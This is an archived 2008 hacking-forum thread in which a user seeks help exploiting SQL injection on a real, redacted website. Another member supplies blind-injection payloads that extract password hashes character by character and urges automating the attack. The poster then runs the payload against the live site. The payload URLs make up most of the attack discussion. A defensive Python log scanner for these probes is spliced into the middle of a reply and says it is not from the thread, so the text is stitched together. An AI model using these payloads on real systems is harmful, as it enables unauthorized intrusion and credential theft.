IT Security and Insecurity Portal

Help with a SQL INJECTION >> Probably BLIND ( HOW?)

Posted: Sat Dec 27, 2008 5:45 pm

ingh1pped
Advanced user
Joined: Dec 13, 2008
Posts: 88

I have found a site vulnerable to SQL injection:
http://www.+++++++/index.php?++++++++=17 union select 1,concat_ws(0x3a,username,password,id),3,4,5,6,7,8,9 from table_accounts--
I say it's OK because if I change table_accounts to another name like fuck_accounts or table_users, it says
Table 'example' doesn't exist
and if I change the columns to another name, for example user or pwd, it says
Unknown column 'example' in 'field list'
Well, it's OK just because I try order by 9-- and it's OK, and order by 10-- NO!
Then I know that the exact query is
union select 1,concat_ws(0x3a,username,password,id),3,4,5,6,7,8,9 from table_accounts--
but when I forced the query with -1 in front, nothing is printed on screen.
And nothing is printed on screen if I try, obviously,
-1 union select 1,2,3,4,5,6,7,8,9-- (no number on screen!)
No number, nothing at all, but the page loads correctly.
So I think it needs a BLIND SQL injection, but how can I make a correct blind query with the arguments
table_accounts, username, password and id?
I'm not very good with blind SQL injection.
What can I try? What response from the site?
THANKS THANKS THANKS for your help!!!

Re: Help with a SQL INJECTION >> Probably BLIND ( HOW?

Posted: Sat Dec 27, 2008 11:02 pm

tehhunter
Valuable expert
Joined: Nov 19, 2008
Posts: 261

ingh1pped wrote: (quoting the original post above in full)

If you have SQL injection and you can make different pages load when you change the parameter you're injecting, blind SQL injection is possible.
First identify different parameters you can put in regularly (e.g. index.php?id=1 and also index.php?id=2). Good, now try something like the following:
index.php?id=-1 union select 0,0,0,0,0,0,0,0,IF(ASCII(SUBSTRING(password FROM 1 FOR 1))<97,1,2) FROM table_users WHERE userid=1--
which is asking whether the first char of 'password' has an ASCII value less than 97. Then just change the condition around and voila, you can extract hashes. I have an exploit using this working for vBulletin and it's awesome. Once you figure it out, I recommend you automate it with a program.
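As an added defender-side example (not code from this thread or from waraxe.us), here is a small Python scanner that URL-decodes the request target of Apache-style access log lines and tags the three probe shapes discussed above: ORDER BY column counting, UNION SELECT column matching, and the boolean-blind IF(ASCII(SUBSTRING(...))) test. The log lines are constructed, and the signature regexes and the per-source counter are my own assumptions, not a product's rules.

```python
import re
from urllib.parse import unquote_plus, urlsplit
# Request shapes from the thread: ORDER BY n column counting, UNION SELECT
# column matching, and the boolean-blind IF(ASCII(SUBSTRING(...))) test.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*(--|#|/\*)", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "boolean_blind": re.compile(r"\bif\s*\(\s*ascii\s*\(\s*substr(ing)?\s*\(", re.I),
}
# Apache combined log format; only the fields used below are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def normalize(target):
    """Decode until stable (handles double encoding), drop inline comments, collapse whitespace."""
    decoded = urlsplit(target).query
    while (again := unquote_plus(decoded)) != decoded:
        decoded = again
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded)

def classify(target):
    """Names of all signatures that match one request target."""
    text = normalize(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_log(lines):
    """(ip, target, status, tags) for every request that matches a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (tags := classify(m["target"])):
            hits.append((m["ip"], m["target"], int(m["status"]), tags))
    return hits

def blind_probe_counts(hits):
    """Boolean-blind requests per source IP; extracting one hash takes hundreds of these."""
    counts = {}
    for ip, _target, _status, tags in hits:
        if "boolean_blind" in tags:
            counts[ip] = counts.get(ip, 0) + 1
    return counts

# Constructed sample lines modelled on the URLs posted in the thread.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Dec/2008:17:45:01 +0000] "GET /index.php?id=17 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Dec/2008:17:45:09 +0000] "GET /index.php?id=17%20order%20by%2010-- HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Dec/2008:17:45:20 +0000] "GET /index.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9-- HTTP/1.1" 200 4980 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Dec/2008:17:46:02 +0000] "GET /index.php?id=-1%20union%20select%200,0,0,0,0,0,0,0,IF(ASCII(SUBSTRING(password%20FROM%201%20FOR%201))%3C97,1,2)%20FROM%20table_users%20WHERE%20userid=1-- HTTP/1.1" 200 4980 "-" "Mozilla/5.0"',
]
```

Because the boolean-blind page loads with status 200 either way, status codes alone will not show this activity; the request count per source is what separates one curious probe from an extraction run.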

Posted: Sun Dec 28, 2008 8:32 pm

ingh1pped
Advanced user
Joined: Dec 13, 2008
Posts: 88

Many thanks tehhunter.... I'm trying your example in more cases...
I try
http://www.******/index.php?com=+++++++++++&user=126&date=-1%20union%20select%200,0,0,0,0,0,0,0,IF(ASCII(SUBSTRING(password%20FROM%201%20FOR%201))%3C97,1,2)%20FROM%20[tabella]%20WHERE%20id=1--
and the page is loaded, then if I try another table name I get an error "table not found"..
Then I think the blind works, but I'm not very expert with blind...
I just try to understand how to make the comparison with the ASCII value..
Sorry, but can I send you a PM with the original link???
www.waraxe.us Forum Index -> Sql injection